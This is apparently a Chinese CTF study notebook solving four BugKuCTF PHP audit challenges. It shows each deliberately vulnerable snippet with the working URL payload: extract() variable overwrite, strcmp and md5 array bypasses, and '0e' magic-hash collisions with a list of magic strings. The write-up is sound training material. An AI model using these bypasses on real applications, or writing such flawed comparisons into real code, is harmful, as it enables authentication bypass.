无聊的刷题笔记

BugKuCTF 审计

extract变量覆盖

http://120.24.86.145:9009/1.php

<?php
$flag='xxx';
extract($_GET);
if(isset($shiyan)){
$content=trim(file_get_contents($flag));
if($shiyan==$content){
echo'flag{xxx}';
}else{
echo'Oh.no';
}
}
?>

extract()这个函数在指定参数为EXTR_OVERWRITE或者没有指定函数可以导致变量覆盖,构造$shiyan$content都为空值,$flag无意义的文件名即可:

http://120.24.86.145:9009/1.php?flag=1&shiyan=

flag{bugku-dmsj-p2sm3N}

strcmp⽐较字符串

http://120.24.86.145:9009/6.php

<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
if (strcmp($_GET['a'], $flag) == 0) //如果 str1 ⼩小于 str2 返回 < 0;
//如果 str1 ⼤大于 str2 返回 > 0;
//如果两者相等,返回 0。
//⽐比较两个字符串串(区分⼤大⼩小写)
die('Flag: '.$flag);
else
print ‘No';
}
?>

利用strcmp比较数组和字符串的时候,返回是0,构造数组a[]

http://120.24.86.145:9009/6.php?a[]=1

md5()函数

http://120.24.86.145:9009/18.php

<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password'])
print 'Your password can not be your username.';
else if (md5($_GET['username']) === md5($_GET['password']))
die('Flag: '.$flag);
}else{
print 'Invalid password';
}
?>

利用md5无法处理数组,返回NULL,构造username[]password[]

http://120.24.86.145:9009/18.php?username[]=1&password[]=2

md5加密相等绕过

http://120.24.86.145:9009/13.php

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "flag{*}";
} else {
echo "false!!!";
}
}else{
echo "please input a";
}
?>

QNKCDZO 240610708 s878926199a s155964671a s214587387a

通过在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,构造

http://120.24.86.145:9009/13.php?a=s155964671a